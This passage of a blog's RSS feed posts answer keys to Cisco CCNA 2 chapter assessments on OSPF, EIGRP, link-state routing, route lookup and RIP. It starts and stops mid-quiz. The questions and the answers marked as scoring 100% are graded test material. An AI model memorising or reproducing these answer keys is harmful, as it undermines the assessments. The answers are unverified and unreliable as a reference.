&lt;span class="Apple-style-span" style="color: red;"&gt;R1(config-router)# network 0.0.0.0 255.255.255.255 area 0&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
17. Refer to the exhibit. What does the "O*E2" from the "O*E2 0.0.0.0/0 [110/1] via 192.168.1.1, 00:05:34, Serial0/0" line represent?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;an external OSPF route that will not increment in cost.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
18. What three parameters must be indentical between OSPF routers in order to form an adjacency? (Choose three.)&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;area id&lt;br /&gt;
hello interval&lt;br /&gt;
network type&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
19. Which two statements describe the use of OSPF DR/BDR elections? (Choose two.)&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;Elections are required in broadcast multiaccess networks.&lt;br /&gt;
Elections are sometimes required in NBMA networks.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
20. What is the default administrative distance for OSPF?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;110&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
21. Refer to the exhibit. What is the cost of the route to the 10.0.0.0 network?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;1786&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
22. Refer to the exhibit. All routers are running OSPF. What cost would JAX put in its routing table for the 10.0.0.0/24 network?&lt;br /&gt;
&lt;br /&gt;
1787&lt;br /&gt;
&lt;br /&gt;
23. Refer to the exhibit. Which command sequence on RouterB will redistribute a gateway of last resort to the other routers in OSPF area 0?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;RouterB(config)# ip route 0.0.0.0 0.0.0.0 172.16.6.6&lt;br /&gt;
RouterB(config)# router ospf 10&lt;br /&gt;
RouterB(config-router)# default-information originate&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
24. Refer to the exhibit. Routers A, B, C, and D are all running OSPF with default router IDs and OSPF interface priorities. Loopback interfaces are not configured and all interfaces are operational. Router D is the DR and router C is the BDR.&lt;br /&gt;
&lt;br /&gt;
What happens immediately after the following commands are entered on router A?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;A(config)# interface fa0/0&lt;br /&gt;
A(config-if)# ip ospf priority 255&lt;br /&gt;
&lt;br /&gt;
D will remain the DR. C will remain the BDR.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
25. Refer to the exhibit. What must be received between neighbors to prevent the dead time that is shown in the exhibit from reaching zero?&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: red;"&gt;hello packets&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-590565309029353772?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-29T12:47:48.448+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>CCNA 2 Take Assessment Chapter 9 - 100%</title><link>http://vanzuearticles.blogspot.com/2010/03/ccna-2-take-assessment-chapter-9-100.html</link><category>CCNA 2 Take Assessment</category><author>vanzue@gmail.com</author><pubDate>Sun, 21 Mar 2010 06:09:20 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-7339606837154547545</guid><description>&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span" style="font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 14px;"&gt;&lt;span style="color: red;"&gt;Expect minimum percentage: 100%&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
1. On a router running EIGRP, what database would maintain a list of feasible successors?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
topology table&lt;br /&gt;
&lt;br /&gt;
2. Refer to the exhibit. This is the debug output from 2 directly connected EIGRP routers. They are not forming an adjacency. What is the cause?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
they have different autonomous-system numbers&lt;br /&gt;
&lt;br /&gt;
3. Refer to the exhibit. Which command will advertise the 192.168.1.64/30 network but not the 192.168.1.32 network on router A?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
network 192.168.1.64 0.0.0.3&lt;br /&gt;
&lt;br /&gt;
4. What two actions will the EIGRP DUAL FSM take if a link to a network goes down? (Choose two.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
query neighbors for a new route&lt;br /&gt;
search topology table for a feasible successor&lt;br /&gt;
&lt;br /&gt;
5. Refer to the exhibit. What is indicated by the P at the beginning of the topology entry?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
the route is in a stable state&lt;br /&gt;
&lt;br /&gt;
6. In which of the following tables does the EIGRP DUAL algorithm store the primary route to a destination? (Choose two.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
routing&lt;br /&gt;
topology&lt;br /&gt;
&lt;br /&gt;
7. What information is maintained in the EIGRP topology database for a destination route? (Choose two.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
the feasible distance of the route&lt;br /&gt;
the route cost as advertised by the neighboring router&lt;br /&gt;
&lt;br /&gt;
8. Which of the following statements describes the bounded updates used by EIGRP?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
Partial updates are sent only to routers that need the information.&lt;br /&gt;
&lt;br /&gt;
9. Host 192.168.1.66 in the network illustrated is unable to ping host 192.168.1.130. How must EIGRP be configured to enable connectivity between the two hosts? (Choose two.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
R1(config-router)# no auto-summary&lt;br /&gt;
R2(config-router)# no auto-summary&lt;br /&gt;
&lt;br /&gt;
10. Which two statements describe characteristics of EIGRP? (Choose two.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
EIGRP is a distance vector routing protocol.&lt;br /&gt;
EIGRP supports classless routing and VLSM.&lt;br /&gt;
&lt;br /&gt;
11. Refer to the exhibit. Based on the output of show ip eigrp neighbors, what are two possible problems with adjacencies between Router1 and Router2? (Choose two.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
The routers are configured with different EIGRP process IDs.&lt;br /&gt;
The serial interfaces for both routers are in different networks.&lt;br /&gt;
&lt;br /&gt;
12. Refer to the exhibit. In the topology table, what do the numbers 3011840 and 3128695 represent?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
the total metric for that network as advertised by the EIGRP neighbor&lt;br /&gt;
&lt;br /&gt;
13. Refer to the exhibit. EIGRP is the only routing protocol enabled on this network. No static routes are configured on this router. What can be concluded about network 198.18.1.0/24 from the exhibited output?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
Packets that are destined for 198.18.1.0/24 will be forwarded to 198.18.10.6.&lt;br /&gt;
&lt;br /&gt;
14. Refer to the exhibit. All interfaces have been configured with the bandwidths that are shown in the exhibit. Assuming that all routers are using a default configuration of EIGRP as their routing protocol, what path will packets take from the 172.16.1.0/16 network to the 192.168.200.0/24 network?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
A,B,E&lt;br /&gt;
&lt;br /&gt;
15. By default, which two metrics are used by EIGRP to determine the best path between networks?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
delay&lt;br /&gt;
bandwidth&lt;br /&gt;
&lt;br /&gt;
16. Which term defines a collection of networks under the administrative control of a single entity that presents a common routing policy to the Internet?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
autonomous system&lt;br /&gt;
&lt;br /&gt;
17. Refer to the exhibit. The company is using EIGRP with an autonomous system number of 10. Pings between hosts on networks that are connected to router A and those that are connected to router B are successful. However, users on the 192.168.3.0 network are unable to reach users on the 192.168.1.32 network. What is the most likely cause of this problem?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
The routers are not configured in the same EIGRP routing domain.&lt;br /&gt;
&lt;br /&gt;
18. In the command router eigrp 20, what is the purpose of the number 20?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
identifies the autonomous system number this EIGRP process will advertise&lt;br /&gt;
&lt;br /&gt;
19. The show ip eigrp topology command output on a router displays a successor route and a feasible successor route to network 192.168.1.0/24. In order to reduce processor utilization, what does EIGRP do when the primary route to this network fails?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
The backup route to network 192.168.1.0/24 is installed in the routing table.&lt;br /&gt;
&lt;br /&gt;
20. What administrative distance would a router assign to a default route in EIGRP that is learned from a source external to the autonomous system?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
170&lt;br /&gt;
&lt;br /&gt;
21. Refer to the exhibit. Network 192.168.0.0/28 goes down. What type of packet does Router2 immediately send to Router1 and Router3?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
unicast update packets to 192.168.1.1 and 192.168.2.1&lt;/span&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-7339606837154547545?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-21T20:09:20.463+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>CCNA 2 Take Assessment Chapter 10 - 100%</title><link>http://vanzuearticles.blogspot.com/2010/03/ccna-2-take-assessment-chapter-10-100.html</link><category>CCNA 2 Take Assessment</category><author>vanzue@gmail.com</author><pubDate>Sun, 21 Mar 2010 18:42:50 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-1550411688308595512</guid><description>&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span" style="font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 14px;"&gt;&lt;span style="color: red;"&gt;Expect minimum percentage: 100%&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
1. Which algorithm is run by link-state routing protocols to calculate the shortest path to destination networks?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
Dijkstra&lt;br /&gt;
&lt;br /&gt;
2. What feature do modern link-state protocols provide to minimize processing and memory requirements?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
splitting routing topologies into smaller areas&lt;br /&gt;
&lt;br /&gt;
3. What is the final step in the link state routing process?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
SPF computes best path to each destination network&lt;br /&gt;
&lt;br /&gt;
4. Refer to the exhibit. Which statement correctly describes the path traffic would take from the 10.0.0.0/24 network to the 192.168.1.0/24 network if a link-state routing protocol was in use?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
BOS -&amp;gt; ORL -&amp;gt; JAX -&amp;gt; ATL because this path is the lowest cost&lt;br /&gt;
&lt;br /&gt;
5. Refer to the exhibit. What kind of information would be seen in an LSP sent from router JAX to router ATL?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
cost of the link&lt;br /&gt;
&lt;br /&gt;
6. Refer to the exhibit. When Router D is configured to use a link-state routing protocol and is added to the network, what is the first thing that it does to begin learning the network topology?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
It learns about its directly connected networks when its interfaces reach the up state.&lt;br /&gt;
&lt;br /&gt;
7. What two statements correctly describe the link state routing process? (Choose two.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
all routers in the area have link state databases&lt;br /&gt;
each router in the area floods LSPs to all neighbors&lt;br /&gt;
&lt;br /&gt;
8. What speeds up convergence in a network using link-state routing?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
updates triggered by network changes&lt;br /&gt;
&lt;br /&gt;
9. Why is it difficult for routing loops to occur in networks that use link-state routing?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
Each router builds a complete and synchronized view of the network.&lt;br /&gt;
&lt;br /&gt;
10. What are two advantages of using a link-state routing protocol instead of a distance vector routing protocol? (Choose two.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
Each router independently determines the route to each network.&lt;br /&gt;
After the inital LSP flooding, they generally require less bandwidth to communicate changes in a topology.&lt;br /&gt;
&lt;br /&gt;
11. To achieve network convergence, what three steps does each link state router take? (Choose three.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
build a Link State Packet (LSP) containing the state of each directly connected link&lt;br /&gt;
flood the LSP to all neighbors, who then store all LSPs received in a database&lt;br /&gt;
construct a complete map of the topology and compute the best path to each destination network&lt;br /&gt;
&lt;br /&gt;
12. What two events will cause a link state router to send LSPs to all neighbors? (Choose two.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
whenever the network topology changes&lt;br /&gt;
upon initial startup of router or routing protocol&lt;br /&gt;
&lt;br /&gt;
13. Which database or table must be identical on all link-state routers within an area in order to construct an accurate SPF tree?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
link-state database&lt;br /&gt;
&lt;br /&gt;
14. Which two routing protocols use Dijkstra’s shortest path first algorithm? (Choose two.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
IS-IS&lt;br /&gt;
OSPF&lt;br /&gt;
&lt;br /&gt;
15. When are link-state packets sent to neighbors?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
when a link goes up or down&lt;br /&gt;
&lt;br /&gt;
16. Refer to the exhibit. What does JAX do with link-state packets from ORL?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
sends out the individual link-state packets out the interface connected to BOS&lt;br /&gt;
&lt;br /&gt;
17. A new network administrator is given the task of selecting an appropriate dynamic routing protocol for a software development company. The company has over 100 routers, uses CIDR and VLSM, requires fast convergence, and uses both Cisco and non-Cisco equipment. Which routing protocol is appropriate for this company?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
OSPF&lt;br /&gt;
&lt;br /&gt;
18. What action does a link-state router take immediately upon receipt of an LSP from a neighboring router?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
floods the LSP to neighbors&lt;br /&gt;
&lt;br /&gt;
19. Refer to the exhibit. If all routers and interfaces are configured to use a link-state routing protocol, from which routers will router D receive hello packets?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
B and C&lt;/span&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-1550411688308595512?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-22T08:42:50.134+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>CCNA 2 Take Assessment Chapter 8 - 100%</title><link>http://vanzuearticles.blogspot.com/2010/03/ccna-2-take-assessment-chapter-8-100.html</link><category>CCNA 2 Take Assessment</category><author>vanzue@gmail.com</author><pubDate>Sun, 21 Mar 2010 02:36:42 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-4875115740400213587</guid><description>&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span" style="font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 14px;"&gt;&lt;span style="color: red;"&gt;Expect minimum percentage: 100%&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
1. Refer to the exhibit. The network administrator has discovered that packets destined for servers on the 172.16.254.0 network are being dropped by Router2. What command should the administrator issue to ensure that these packets are sent out the gateway of last resort, Serial 0/0/1?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
ip classless&lt;br /&gt;
&lt;br /&gt;
2. Refer to the exhibit. How many routes in this output qualify for use as ultimate routes?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
7&lt;br /&gt;
&lt;br /&gt;
3. The following entry is displayed in the routing table:&lt;br /&gt;
&lt;br /&gt;
R 192.168.8.0/24 [120/2] via 192.168.4.1, 00:00:26, Serial0/0/1&lt;br /&gt;
&lt;br /&gt;
What type of route is this?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
a level 1 ultimate network route&lt;br /&gt;
&lt;br /&gt;
4. Refer to the exhibit. The graphic contains partial contents of the routing table on router E. Router E is running version 12.3 of the IOS and is configured for default routing behavior. Router E receives a packet to forward. Which route in the routing table will be searched first and why?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
172.16.0.0/25 because it is the first level 1 route&lt;br /&gt;
&lt;br /&gt;
5. Refer to the exhibit. A packet destined for host 128.107.0.5/16 is processed by the JAX router. After finding the static route in the routing table that matches the destination network for this packet, what does the router do next?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
performs a recursive lookup to find the exit interface used to forward the packet&lt;br /&gt;
&lt;br /&gt;
6. A network is converged and the routing tables are complete. When a packet needs to be forwarded, what is the first criterion used to determine the best path in the routing table?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
the route with the longest address and mask match to the destination&lt;br /&gt;
&lt;br /&gt;
7. Refer to the exhibit. Router1 is running IOS version 12.2. What will the network administrator need to do so that packets for unknown child routes of 172.16.0.0/24 will not be dropped?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
do nothing, ip classless is on by default&lt;br /&gt;
&lt;br /&gt;
8. Refer to the exhibit. Router B receives a packet with a destination address of 10.16.1.97. What will router B do?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
use the default route&lt;br /&gt;
&lt;br /&gt;
9. Refer to the exhibit. What protocol was used to distribute the routing information for the network 172.16.1.4?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
RIPv2&lt;br /&gt;
&lt;br /&gt;
10. Refer to the exhibit. What subnet mask will Router1 apply to child routes of the 172.16.0.0/24 network?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
255.255.255.0&lt;br /&gt;
&lt;br /&gt;
11. A route to a destination network is learned from multiple routing protocols. What is used by a Cisco router to select the preferred route to the destination that will be installed in the routing table?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
administrative distance&lt;br /&gt;
&lt;br /&gt;
12. What occurs when no ip classless is implemented on the router?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
The router will assume it has knowledge of all subnets in the network and will not search beyond child routes for a better match.&lt;br /&gt;
&lt;br /&gt;
13. Refer to the exhibit. Router1 has been issued the ip classless command. What happens to packets destined to host 172.16.3.10?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
forward out interface Serial0/0/1&lt;br /&gt;
&lt;br /&gt;
14. Refer to the exhibit. With the ip classless command issued, what will router R2 do with a packet destined for host 172.16.4.234?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
send packet out Serial 0/0/1&lt;br /&gt;
&lt;br /&gt;
15. Refer to the exhibit. What parent network will automatically be included in the routing table when the three subnets are configured on Router1?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
172.16.0.0/16&lt;br /&gt;
&lt;br /&gt;
16. Refer to the exhibit. Which statement correctly describes this network?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
There is at least one parent and one child route&lt;br /&gt;
&lt;br /&gt;
17. Refer to the exhibit. What can be determined from this output?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
All of the routes listed are network routes.&lt;br /&gt;
&lt;br /&gt;
18. What determines if the router implements a classless route lookup process?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
The command ip classless is enabled on the router.&lt;/span&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-4875115740400213587?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-21T16:36:42.218+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>CCNA 2 Take Assessment Chapter 7 - 100%</title><link>http://vanzuearticles.blogspot.com/2010/03/ccna-2-take-assessment-chapter-7-100.html</link><category>CCNA 2 Take Assessment</category><author>vanzue@gmail.com</author><pubDate>Thu, 18 Mar 2010 16:00:03 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-1730455587004040713</guid><description>&lt;div style="text-align: center;"&gt;&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span" style="font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: x-large;"&gt;100%&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span" style="font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 14px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span" style="font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; font-size: 14px;"&gt;1.&amp;nbsp;&lt;span class="content"&gt;Refer to the exhibit. If all routers are running RIP version 2, why is there no route for the 192.168.1.32/27 network?&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
Rip version 2 will auto summarize routes by default.&lt;br /&gt;
&lt;br /&gt;
2. What are two reasons to implement RIP version 2 rather than RIP version 1? (Choose two.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
RIP version 2 supports VLSM.&lt;br /&gt;
RIP version 2 supports routing update authentication.&lt;br /&gt;
&lt;br /&gt;
3. Refer to the exhibit. RIPv1 is configured as the routing protocol for the network that is shown. The following commands are used on each router:&lt;br /&gt;
router rip&lt;br /&gt;
network 10.0.0.0&lt;br /&gt;
network 172.16.0.0&lt;br /&gt;
When this configuration is complete, users on the LAN of each router are unable to access the remote LANs. Why?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
RIPv1 is unable to route to discontiguous subnets of a major network.&lt;br /&gt;
&lt;br /&gt;
4. Refer to the exhibit. What effect will the commands that are shown have on RIP updates for Router1?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
Only version 2 updates are sent to 224.0.0.9.&lt;br /&gt;
&lt;br /&gt;
5. Refer to the exhibit. A technician needs to add a new loopback interface to test routing functionality and network design. The technician enters the following set of commands on the router:&lt;br /&gt;
Sanford(config)# interface loopback1&lt;br /&gt;
Sanford(config-if)# ip address 192.168.6.62 255.255.255.252&lt;br /&gt;
Why does the router respond with an error?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
The network address for Loopback1 overlaps with an already configured interface address.&lt;br /&gt;
&lt;br /&gt;
6. What is the maximum network diameter permitted by the default metric of RIPv2?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
15 hops&lt;br /&gt;
&lt;br /&gt;
7. Refer to the exhibit. All routers are running RIP version 2. JAX is configured to just advertise the 10.0.0.0/24 network. CHI is configured to advertise the 172.16.0.0/16 network. A network administrator enters the commands shown in the exhibit. What changes will occur in this network?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
The CHI router will install a route to the 192.168.0.0/16 network in its routing table.&lt;br /&gt;
&lt;br /&gt;
8. Refer to the exhibit. What can be concluded from the output shown in the exhibit?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
The no auto-summary has not been configured on this router.&lt;br /&gt;
&lt;br /&gt;
9. Refer to the exhibit. All routers are running RIPv1. What changes will occur in the routing table of router B if a loopback interface with an address of 10.16.1.129/27 is configured on router B?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
A connected route to the 10.16.1.128/27 network is added.&lt;br /&gt;
&lt;br /&gt;
10. How are RIP v1 and RIP v2 similar to one another? (Choose three.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
They both use hop count as a metric.&lt;br /&gt;
They both have the same metric value for infinite distance.&lt;br /&gt;
They both use split horizon to prevent routing loops.&lt;br /&gt;
&lt;br /&gt;
11. RIPv2 is the configured routing protocol on the routers in a network. The command Router(config-router)# no version 2 is entered on the routers. What effect does entering this command have on routing updates?&lt;br /&gt;
&lt;span style="color: #009900;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
Version 1 and 2 updates will be received and the version 2 updates will not be sent.&lt;br /&gt;
&lt;br /&gt;
12. A network administrator installed four new routers that are running RIPv2. Router1 is a boundary router in the RIPv2 network and has a default route configured. Once the network has converged, the network administrator enters Router1(config-router)# default-information originate on Router1. How will this affect the network?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
propagates the default route to all routers in the network&lt;br /&gt;
&lt;br /&gt;
13. Refer to the exhibit. The exhibited network contains a mixture of Cisco and non-Cisco routers. The command debug ip rip was entered on the JAX router. All routers are running the same version of RIP. Router CHI and Router ORL are not able to reach the 192.168.1.16/28 network. What is a possible solution to this problem?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
Configure RIPv2 on routers.&lt;br /&gt;
&lt;br /&gt;
14. Refer to the exhibit. Which command on which router will allow Router1 to learn about the 192.168.0.0/20 network?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
Router2(config-router)# version 2&lt;br /&gt;
&lt;br /&gt;
15. A network administrator has been told that the company IP address infrastructure must adhere to RFC 1918. What three IP address ranges from RFC 1918 could the administrator use on the network? (Choose three.)&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
10.0.0.0/8&lt;br /&gt;
172.16.0.0/12&lt;br /&gt;
192.168.0.0/16&lt;br /&gt;
&lt;br /&gt;
16. Refer to the exhibit. Routers East and West are configured using RIPv1. Both routers are sending updates about their directly connected routes. The East router can ping the West router serial interface and West can ping the serial interface of East. However, neither router has dynamically learned routes from the other. What is most likely the problem?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
VLSM is not supported by RIPv1.&lt;br /&gt;
&lt;br /&gt;
17. Refer to the exhibit. Which command will allow Router2 to learn about the 192.168.16.0/28 network?&lt;br /&gt;
&lt;span style="color: #33cc00;"&gt;ans:&lt;/span&gt;&lt;br /&gt;
Router1(config-router)# network 192.168.16.0&lt;br /&gt;
&lt;br /&gt;
18. What field was added to the RIP message header by RFC 1723 to add support for VLSM and CIDR?&lt;br /&gt;
